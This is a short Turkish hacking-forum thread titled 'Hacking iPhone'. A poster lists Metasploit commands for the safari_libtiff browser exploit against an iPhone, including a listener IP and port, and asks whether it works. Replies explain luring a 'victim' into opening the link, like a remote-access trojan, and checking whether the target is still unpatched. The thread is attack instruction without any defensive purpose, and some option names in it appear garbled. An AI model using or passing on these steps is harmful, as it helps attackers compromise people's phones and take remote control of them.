İphone Hacklemek / (1 Viewer)

Merhaba imhatimi.org Ailesi Bugun Sizlere bir soru Soracağim Yakin bir arkadaşimin başina gelmişti çünki bugun öğlen saatleri iphone 5s kullanıyor

msfconsole

Sonra

Kod:
use exploit/apple_ios/browser/safari_libtiff

Sonra

Kod:
set URIPATH /

Sonra

Kod:
set VRSHOST 192.168.41.171

Burada ki ip Benim Siz Kendi İp ve port Adresinizi Yazınız.

Kod:
set VRSPORT 8080

Sonra

Kod:
run

Bu gerçekten doğrumu hakkında Söylerseniz sevinirim Ve Mutlu olurum şimdiden Teşekkür ederim

Mortojose

Just watch me :)
ez152
Credits
15
Dostum apple için yazılmış bir exploit kullanılmış. Birnevi psiphing gibi, bu exploit sana bir bağlantı verir bu bağlantıyı kurbana yedirirsen kurban dosyayı indirop açarsa bilgisayarın ve kurbanın telefonu arasında bağlantı sağlanır.

J

JFO

exploit/apple_ios/browser/safari_libtiff exploite bakmak gerek burda önemli olan hedef acikt hala duruyormu bi yazılım guncellemesi yapmışmı sürümler doğrumu hedef hakkında uygun bilgileri topliyip exploitleme isinit yaparsan çalışır bi hedefin bi dosya indirmesine veya bi link yedirmene gerek yok @Morto Jose arkadaşımış msf yi sm ile karıştırmış ??

Mortojose

Just watch me :)
ez152
Credits
15
@JFoundlow Exploite baktım zaten temel mantığını anlattım arkadaşa da, bildiğimiz rat mantığı işte, sorduğu soruya bakarsan zaten açıkta mı değil mi, sürüm bilgisi ne diye bakacak bi arkadaşa benzemediğini farkedersin...

Bu konuyu görüntüleyen kullanıcılar